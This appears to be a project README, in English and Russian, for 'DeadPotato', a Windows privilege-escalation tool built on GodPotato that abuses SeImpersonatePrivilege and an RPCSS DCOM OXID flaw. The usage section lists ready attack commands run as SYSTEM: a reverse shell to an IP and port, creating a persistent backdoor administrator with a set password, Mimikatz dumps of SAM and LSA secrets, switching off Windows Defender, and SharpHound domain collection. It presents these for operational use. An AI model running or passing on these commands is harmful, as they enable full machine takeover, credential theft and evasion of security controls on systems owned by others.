C:Userslypd0> GodPotato.exe ⠀⢀⣠⣤⣤⣄⡀⠀ _ _ ⣴⣿⣿⣿⣿⣿⣿⣦ | _ _ _||_) _ _|_ _ _|_ _ ⣿⣿⣿⣿⣿⣿⣿⣿ |_/(/_(_|(_|| (_) |_(_| |_(_) ⣇⠈⠉⡿⢿⠉⠁⢸ Open Source @ github.com/lypd0 ⠙⠛⢻⣷⣾⡟⠛⠋ -= Version: 1.2 =- ⠈⠁⠀⠀⠀ _,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_ (*) Example Usage(s): -={ deadpotato.exe -MODULE [ARGUMENTS] }=- -> deadpotato.exe -cmd "whoami" -> deadpotato.exe -rev 192.168.10.30:9001 -> deadpotato.exe -exe paylod.exe -> deadpotato.exe -newadmin lypd0:DeadPotatoRocks1 -> deadpotato.exe -shell -> deadpotato.exe -mimi sam -> deadpotato.exe -defender off -> deadpotato.exe -sharphound (*) Available Modules: - cmd: Execute a command as NT AUTHORITYSYSTEM. - rev: Attempts to establish a reverse shell connection to the provided host - exe: Execute a program with NT AUTHORITYSYSTEM privileges (Does not support interactivity). - newadmin: Create a new administrator user on the local system. - shell: Manages to achieve a semi-interactive shell (NOTE: Very bad OpSec!) - mimi: Attempts to dump SAM/LSA/SECRETS with Mimikatz. (NOTE: This will write mimikatz to disk!) - defender: Either enables or disables Windows Defender's real-time protection. - sharphound: Attempts to collect domain data for BloodHound.
Право SeImpersonatePrivilege
включено в вашем контексте? С DeadPotato можно добиться максимальных привилегий в локальной системе.
Инструмент попытается запустить процесс с повышенными правами, работающий в контексте пользователя NT AUTHORITYSYSTEM
, используя недостаток RPCSS DCOM в обработке OXID, обеспечивая неограниченный доступ к машине для свободного выполнения критически важных операций.-cmd
. Многие модули доступны для использования, такие как -rev IP:PORT
для создания обратной оболочки с повышенными правами, -newadmin usr:pass
для создания нового локального пользователя-администратора для сохранения или -mimi sam
для сброса хешей SAM.
Чтобы использовать DeadPotato, право SeImpersonatePrivilege должно быть включено в текущем контексте. Чтобы проверить это, можно выполнить команду whoami /priv
. Если эта привилегия отключена, эксплуатация невозможна в текущем контексте.
C:Userslypd0> whoami /priv <...SNIP...> SeImpersonatePrivilege Impersonate a client after authentication Enabled <...SNIP...>
Этот проект «DeadPotato» представляет собой инструмент, созданный на основе исходного кода шедевра «GodPotato» от BeichenDream. Если вам нравится этот проект, не забудьте также показать поддержку оригинальному проекту.
BeichenDream, Бенджамин ДЕЛЬПИ gentilkiwi
, разработчики BloodHound.
Этот проект распространяется по лицензии Apache 2.0. Пожалуйста, просмотрите файл ЛИЦЕНЗИИ для получения более подробной информации.